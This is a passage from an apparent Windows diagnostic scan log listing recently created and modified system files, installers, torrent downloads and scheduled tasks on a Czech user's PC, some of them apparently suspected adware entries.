2019-07-29 21:05 - 2019-07-10 04:38 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2019-07-29 21:05 - 2019-07-10 04:38 - 000333312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2019-07-29 21:05 - 2019-07-10 04:34 - 013791232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-07-29 21:05 - 2019-07-10 04:31 - 001566208 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-07-29 21:05 - 2019-07-10 04:19 - 004386304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-07-29 21:05 - 2019-07-10 04:19 - 000800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2019-07-29 21:05 - 2019-07-10 04:16 - 001331200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-07-29 21:05 - 2019-07-10 04:15 - 000710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2019-07-29 21:05 - 2019-06-25 05:54 - 001368080 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2019-07-29 21:05 - 2019-06-25 04:59 - 004169728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2019-07-29 21:05 - 2019-06-25 04:36 - 000128512 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2019-07-29 21:05 - 2019-06-25 04:07 - 001994240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2019-07-29 21:05 - 2019-06-25 03:48 - 001756160 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2019-07-29 21:05 - 2019-06-25 03:44 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityService.dll
2019-07-29 21:05 - 2019-06-25 03:42 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2019-07-29 21:05 - 2019-06-25 03:41 - 001085440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2019-07-29 21:05 - 2019-06-25 03:41 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2019-07-29 21:05 - 2019-06-25 03:39 - 001559552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2019-07-29 21:05 - 2019-06-25 03:36 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2019-07-29 21:05 - 2019-06-25 03:31 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2019-07-29 21:05 - 2019-06-25 03:28 - 000827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2019-07-29 21:05 - 2019-06-25 03:26 - 000238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2019-07-29 21:05 - 2019-06-18 05:13 - 000166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2019-07-29 21:05 - 2019-06-18 05:06 - 000269312 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2019-07-29 21:05 - 2019-06-18 04:55 - 000214528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2019-07-29 21:05 - 2019-06-18 04:42 - 001349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-07-29 21:05 - 2019-06-18 04:33 - 000956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2019-07-29 21:05 - 2019-06-15 17:22 - 000910848 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2019-07-29 21:05 - 2019-06-12 02:51 - 000169256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2019-07-29 21:05 - 2019-06-11 15:37 - 000293888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Dism.exe
2019-07-29 21:05 - 2019-06-11 15:35 - 000215040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Dism.exe
2019-07-29 21:05 - 2019-06-10 23:42 - 001712640 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000801792 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000732160 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000501760 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2019-07-29 21:05 - 2019-06-10 23:42 - 000257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2019-07-29 21:05 - 2019-06-08 18:09 - 000445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2019-07-29 21:05 - 2019-06-08 17:55 - 001101824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdvidcrl.dll
2019-07-29 21:05 - 2019-06-08 17:43 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2019-07-29 21:05 - 2019-06-08 17:33 - 000856064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvidcrl.dll
2019-07-29 21:05 - 2019-06-08 16:55 - 007035392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2019-07-29 21:05 - 2019-06-08 16:53 - 006217216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2019-07-29 21:05 - 2019-06-07 00:49 - 007362800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-07-29 21:05 - 2019-06-06 19:14 - 000809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2019-07-29 21:05 - 2019-06-02 17:42 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpclip.exe
2019-07-29 21:05 - 2019-05-31 18:55 - 001265152 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2019-07-29 21:05 - 2019-05-31 18:54 - 000504832 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskcomp.dll
2019-07-29 21:05 - 2019-05-31 18:53 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskcomp.dll
2019-07-29 21:05 - 2019-05-25 04:36 - 022373096 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2019-07-29 21:05 - 2019-05-25 04:32 - 002013432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-07-29 21:05 - 2019-05-25 04:30 - 000500464 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2019-07-29 21:05 - 2019-05-25 04:30 - 000394568 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2019-07-29 21:05 - 2019-05-25 04:30 - 000272184 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2019-07-29 21:05 - 2019-05-25 03:59 - 019790160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2019-07-29 21:05 - 2019-05-25 03:56 - 000370872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2019-07-29 21:05 - 2019-05-25 03:56 - 000344984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2019-07-29 21:05 - 2019-05-25 02:31 - 000963072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-07-29 21:05 - 2019-05-25 02:19 - 000551152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2019-07-29 21:05 - 2019-05-25 02:17 - 000230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2019-07-29 21:05 - 2019-05-22 20:20 - 000120312 _____ (Microsoft Corporation) C:\WINDOWS\system32\userenv.dll
2019-07-29 21:05 - 2019-05-22 19:50 - 000098320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\userenv.dll
2019-07-29 21:05 - 2019-05-21 02:50 - 001383424 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2019-07-29 21:05 - 2019-05-17 06:47 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2019-07-29 21:05 - 2019-05-17 06:07 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2019-07-29 21:05 - 2019-05-16 20:23 - 000444144 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2019-07-29 21:05 - 2019-05-16 20:22 - 000334280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-07-29 21:05 - 2019-05-15 22:33 - 000333552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2019-07-29 21:05 - 2019-05-15 02:53 - 000136800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2019-07-29 21:05 - 2019-05-14 22:23 - 000377800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2019-07-29 21:05 - 2019-05-14 16:18 - 003718144 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2019-07-29 21:05 - 2019-05-11 17:50 - 001441792 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-07-29 21:05 - 2019-05-11 17:46 - 000840704 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2019-07-29 21:05 - 2019-05-11 17:34 - 000697344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2019-07-29 21:05 - 2019-05-10 15:20 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2019-07-29 21:05 - 2019-05-10 15:20 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-07-29 21:05 - 2019-05-10 15:20 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2019-07-29 21:05 - 2019-05-10 15:20 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2019-07-29 21:05 - 2019-05-09 09:41 - 003325440 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2019-07-29 21:05 - 2019-05-09 08:40 - 002779648 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2019-07-29 21:05 - 2019-05-09 08:30 - 003619328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2019-07-29 21:05 - 2019-05-09 07:47 - 002464256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2019-07-29 21:05 - 2019-05-06 05:47 - 001311768 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2019-07-29 21:05 - 2019-05-06 05:36 - 001677024 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2019-07-29 21:05 - 2019-05-06 05:36 - 001537776 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2019-07-29 21:05 - 2019-05-06 05:34 - 000805384 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2019-07-29 21:05 - 2019-05-06 05:33 - 001136208 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2019-07-29 21:05 - 2019-05-06 04:12 - 000861184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2019-07-29 21:05 - 2019-05-06 04:08 - 001040384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2019-07-29 21:05 - 2019-05-06 03:41 - 001197056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2019-07-29 21:05 - 2019-04-25 00:38 - 002452208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2019-07-29 21:05 - 2019-04-14 18:37 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2019-07-29 21:05 - 2019-04-14 18:35 - 000148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2019-07-29 21:05 - 2019-04-14 18:09 - 000078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2019-07-29 21:05 - 2019-04-14 18:07 - 000113664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2019-07-29 21:05 - 2019-04-12 15:20 - 000994384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2019-07-29 21:05 - 2019-04-12 15:20 - 000914584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2019-07-29 21:05 - 2019-04-12 15:20 - 000064248 _____ (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-crt-private-l1-1-0.dll
2019-07-29 21:05 - 2019-04-09 00:17 - 000537096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2019-07-29 21:05 - 2019-04-09 00:17 - 000139912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2019-07-29 21:05 - 2019-04-09 00:13 - 000449744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2019-07-29 21:05 - 2019-04-09 00:12 - 000136736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2019-07-29 21:05 - 2019-04-08 23:40 - 000136432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys
2019-07-29 21:05 - 2019-04-07 02:57 - 001214720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2019-07-29 21:05 - 2019-04-06 22:31 - 000376320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2019-07-29 21:05 - 2019-04-06 20:39 - 002172832 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2019-07-29 21:05 - 2019-04-06 20:39 - 001662512 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2019-07-29 21:05 - 2019-04-06 00:47 - 000096208 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdll.dll
2019-07-29 21:05 - 2019-04-06 00:46 - 000177608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2019-07-29 21:05 - 2019-04-06 00:44 - 000073248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptdll.dll
2019-07-29 21:05 - 2019-04-05 16:06 - 001253888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2019-07-29 21:05 - 2019-04-05 16:06 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2019-07-29 21:05 - 2019-04-05 16:06 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2019-07-29 21:05 - 2019-04-05 16:01 - 000160256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2019-07-29 21:05 - 2019-04-05 01:58 - 000863232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2019-07-29 21:05 - 2019-04-05 00:15 - 000513416 _____ C:\WINDOWS\SysWOW64\locale.nls
2019-07-29 21:05 - 2019-04-05 00:15 - 000513416 _____ C:\WINDOWS\system32\locale.nls
2019-07-29 21:05 - 2019-04-04 20:01 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2019-07-29 21:05 - 2019-04-04 19:10 - 001080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2019-07-29 21:05 - 2019-04-04 18:48 - 000713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2019-07-29 21:05 - 2019-04-04 18:15 - 000562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2019-07-29 20:58 - 2019-06-25 04:59 - 000146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2019-07-29 20:58 - 2019-06-25 04:24 - 000129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2019-07-29 01:17 - 2019-07-29 01:29 - 000000000 ____D C:\Users\Radim\Downloads\Simpsonovi 28. sĂ©rie
2019-07-27 13:23 - 2019-07-29 23:50 - 000000000 ____D C:\Users\Radim\AppData\Local\CrashDumps
2019-07-25 15:39 - 2019-07-25 15:39 - 000387896 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswVmm.sys
2019-07-24 11:41 - 2019-07-24 11:41 - 000002101 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2019-07-24 11:41 - 2019-07-24 11:41 - 000000000 ____D C:\Users\Radim\AppData\Roaming\AVAST Software
2019-07-24 11:41 - 2019-07-24 11:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2019-07-24 11:39 - 2019-07-30 02:39 - 000000000 ____D C:\WINDOWS\System32\Tasks\Avast Software
2019-07-24 11:39 - 2019-07-24 11:39 - 000003910 _____ C:\WINDOWS\System32\Tasks\Avast Emergency Update
2019-07-24 11:38 - 2019-07-24 11:38 - 001030992 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSnx.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000477288 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000363400 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2019-07-24 11:38 - 2019-07-24 11:38 - 000279336 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswHdsKe.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000263224 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbidsdriver.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000225816 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswStm.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000209256 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswArPot.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000206056 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbidsh.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000169112 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswMonFlt.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000112520 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRdr2.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000088160 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRvrt.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000061688 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbuniv.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000042504 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswKbd.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000037320 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswArDisk.sys
2019-07-24 11:38 - 2019-07-24 11:38 - 000000000 ____D C:\Program Files\Common Files\AVAST Software
2019-07-24 11:37 - 2019-07-24 11:37 - 000000000 ____D C:\Program Files\AVAST Software
2019-07-24 11:36 - 2019-07-24 11:38 - 000000000 ____D C:\ProgramData\AVAST Software
2019-07-24 11:36 - 2019-07-24 11:36 - 000228544 _____ (AVAST Software) C:\Users\Radim\Downloads\avast_free_antivirus_setup_online.exe
2019-07-24 11:00 - 2019-07-30 10:26 - 000000986 _____ C:\Users\Public\Desktop\Firefox.lnk
2019-07-24 11:00 - 2019-07-24 11:00 - 000000000 ____D C:\Users\Radim\Desktop\PĹŻvodnĂ data aplikace Firefox
2019-07-24 11:00 - 2019-07-24 11:00 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-07-24 11:00 - 2019-07-24 11:00 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-07-24 10:58 - 2019-07-24 10:59 - 000285552 _____ (Mozilla) C:\Users\Radim\Downloads\Firefox Installer.exe
2019-07-24 10:54 - 2019-07-24 10:54 - 002388176 _____ (Microsoft Corporation) C:\Users\Radim\Downloads\d3dx9_30.dll
2019-07-23 11:36 - 2019-07-23 15:50 - 1598653180 ____R C:\Users\Radim\Downloads\NFS Underground 2 HD TEXTURY +ENB-MOD+ NOVE AUTA.rar
2019-07-19 13:29 - 2019-07-19 13:29 - 001151544 _____ (Google LLC) C:\Users\Radim\Downloads\ChromeSetup.exe
2019-07-15 13:27 - 2019-07-30 09:34 - 000004060 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1555619304
2019-07-15 13:27 - 2019-07-15 13:27 - 000001377 _____ C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ProhlĂĹľeÄŤ Opera.lnk
2019-07-15 11:51 - 2019-07-15 11:51 - 000000270 __RSH C:\ProgramData\ntuser.pol
2019-07-15 09:49 - 2019-07-15 09:50 - 000000000 ____D C:\Users\Radim\Desktop\bryna mrdky
2019-07-15 09:45 - 2019-07-15 09:45 - 003462156 _____ C:\Users\Radim\Downloads\WDFirmwareUpdater.zip
2019-07-14 21:14 - 2019-07-14 21:14 - 000000000 _____ C:\Users\Radim\Desktop\NovĂ˝ textovĂ˝ dokument (2).txt
2019-07-10 17:01 - 2019-07-10 17:01 - 000021076 _____ C:\Users\Radim\Downloads\[CzT]Serif_a_mimozemstan_1_2_Uno_sceriffo_extra_terrestre_Chissa_perche_capitano_1979_1981_.torrent
2019-07-10 16:13 - 2019-07-10 16:13 - 000016610 _____ C:\Users\Radim\Downloads\[CzT]Tang_lang_Shaolin_Mantis_1978_CZ_.torrent
2019-07-09 10:05 - 2019-07-09 10:32 - 000000000 ____D C:\Users\Radim\Downloads\KrvavĂ˝ sport 1,2,3
2019-07-09 09:45 - 2019-07-09 09:46 - 000001253 _____ C:\Users\Radim\Desktop\Wow.lnk
2019-07-08 17:44 - 2019-07-08 17:52 - 1976872960 ____R C:\Users\Radim\Downloads\Independence.Day.Resurgence.2016.BRRip.XviD.CZ-TreZzoR.avi
2019-07-08 17:43 - 2019-07-08 17:43 - 000014496 _____ C:\Users\Radim\Downloads\[CzT]Krvavy_sport_Bloodsport_1_2_3_1988_1996_.torrent
2019-07-08 17:39 - 2019-07-08 17:39 - 000019446 _____ C:\Users\Radim\Downloads\[CzT]Den_nezavislosti_Novy_utok_Independence_Day_Resurgence_2016_CZ_.torrent
2019-07-01 10:11 - 2019-07-18 10:26 - 000000000 ____D C:\Users\Radim\AppData\Roaming\Discord
2019-07-01 10:11 - 2019-07-01 10:11 - 000002211 _____ C:\Users\Radim\Desktop\Discord.lnk
2019-07-01 10:11 - 2019-07-01 10:11 - 000000000 ____D C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2019-07-01 10:10 - 2019-07-01 10:11 - 000000000 ____D C:\Users\Radim\AppData\Local\SquirrelTemp
2019-07-01 10:10 - 2019-07-01 10:11 - 000000000 ____D C:\Users\Radim\AppData\Local\Discord
2019-07-01 10:09 - 2019-07-01 10:09 - 061370712 _____ (Discord Inc.) C:\Users\Radim\Downloads\DiscordSetup.exe

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-07-30 09:59 - 2014-05-03 10:54 - 000003600 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2652530150-2383877666-4203637229-1007
2019-07-30 09:47 - 2014-05-17 20:19 - 000000000 ____D C:\Users\Radim\AppData\Roaming\uTorrent
2019-07-30 09:46 - 2014-08-07 09:15 - 000539648 ___SH C:\Users\Radim\Downloads\Thumbs.db
2019-07-30 09:42 - 2017-05-16 13:09 - 000000000 ____D C:\Users\Radim\AppData\LocalLow\Mozilla
2019-07-30 09:40 - 2014-03-18 17:33 - 001742514 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-07-30 09:40 - 2014-03-18 16:54 - 000735548 _____ C:\WINDOWS\system32\perfh005.dat
2019-07-30 09:40 - 2014-03-18 16:54 - 000149356 _____ C:\WINDOWS\system32\perfc005.dat
2019-07-30 09:40 - 2013-08-22 15:36 - 000000000 ____D C:\WINDOWS\Inf
2019-07-30 09:34 - 2019-04-05 19:51 - 000002810 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2019-07-30 09:34 - 2018-03-15 18:57 - 000004530 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player NPAPI Notifier
2019-07-30 09:34 - 2017-05-14 21:06 - 000006066 _____ C:\WINDOWS\System32\Tasks\Wotustupocult Controls
2019-07-30 09:34 - 2017-01-30 20:35 - 000003150 _____ C:\WINDOWS\System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F}
2019-07-30 09:34 - 2016-05-04 16:58 - 000001844 _____ C:\WINDOWS\System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC}
2019-07-30 09:34 - 2016-05-03 20:01 - 000001708 _____ C:\WINDOWS\System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A}
2019-07-30 09:34 - 2016-02-10 17:48 - 000000000 ____D C:\Users\Radim\AppData\Roaming\vlc
2019-07-30 09:34 - 2015-10-18 13:21 - 000001710 _____ C:\WINDOWS\System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A}
2019-07-30 09:34 - 2015-08-19 21:12 - 000004358 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2019-07-30 09:34 - 2015-08-19 21:12 - 000004236 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2019-07-30 09:34 - 2014-11-26 21:22 - 000002108 _____ C:\WINDOWS\System32\Tasks\BrickEnforcer-S-1910914952
2019-07-30 09:34 - 2014-11-26 21:22 - 000000536 ____H C:\WINDOWS\Tasks\BrickEnforcer-S-1910914952.job
2019-07-30 09:34 - 2014-05-03 11:00 - 000003830 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{73E8F541-BE16-471F-9D66-FB2B6A5B539C}
2019-07-30 09:34 - 2014-04-30 11:20 - 000002794 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{059DD3C0-0B7A-4B9B-BF0B-C04E115C228F}
2019-07-30 09:34 - 2014-04-29 13:22 - 000002040 _____ C:\WINDOWS\System32\Tasks\CreateChoiceProcessTask
2019-07-30 09:34 - 2014-04-29 10:03 - 000002888 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2652530150-2383877666-4203637229-1001
2019-07-30 01:55 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\system32\NDF
2019-07-30 00:54 - 2014-05-03 10:48 - 000000000 __SHD C:\Users\Radim\IntelGraphicsProfiles
2019-07-30 00:53 - 2016-05-18 19:52 - 000000049 ___SH C:\WINDOWS\SysWOW64\mmf.sys
2019-07-30 00:53 - 2013-08-22 16:45 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-07-30 00:41 - 2014-04-30 12:49 - 000000000 ____D C:\Program Files (x86)\ATI Technologies
2019-07-30 00:36 - 2014-04-29 14:28 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2019-07-30 00:35 - 2014-04-30 12:49 - 000000000 ____D C:\ProgramData\Package Cache
2019-07-30 00:32 - 2014-04-29 13:26 - 000000000 ____D C:\SWSetup
2019-07-29 23:53 - 2016-02-10 17:46 - 000000887 _____ C:\Users\Public\Desktop\VLC media player.lnk
2019-07-29 23:52 - 2014-05-03 11:35 - 000425472 ___SH C:\Users\Radim\Desktop\Thumbs.db
2019-07-29 23:44 - 2019-04-05 19:50 - 000000836 _____ C:\Users\Public\Desktop\CCleaner.lnk
2019-07-29 21:50 - 2012-07-26 09:59 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-07-29 21:40 - 2013-08-22 16:44 - 000400512 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-07-29 21:33 - 2014-12-09 22:20 - 000000000 ____D C:\WINDOWS\system32\appraiser
2019-07-29 21:33 - 2013-08-22 17:36 - 000000000 ___RD C:\WINDOWS\ToastData
2019-07-29 21:33 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2019-07-29 21:33 - 2013-08-22 15:36 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2019-07-29 21:33 - 2013-08-22 15:36 - 000000000 ____D C:\WINDOWS\system32\Dism
2019-07-29 21:27 - 2014-04-30 12:53 - 000000000 ____D C:\Program Files\AMD
2019-07-29 21:18 - 2014-04-29 10:08 - 000000000 ____D C:\Program Files (x86)\Intel
2019-07-29 21:07 - 2014-04-29 10:30 - 136618864 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-07-29 11:26 - 2014-05-03 10:48 - 000000000 ____D C:\Users\Radim
2019-07-27 03:40 - 2013-08-22 17:36 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-07-26 23:00 - 2017-05-14 21:04 - 000000000 ____D C:\Users\Radim\AppData\Roaming\ServerTest
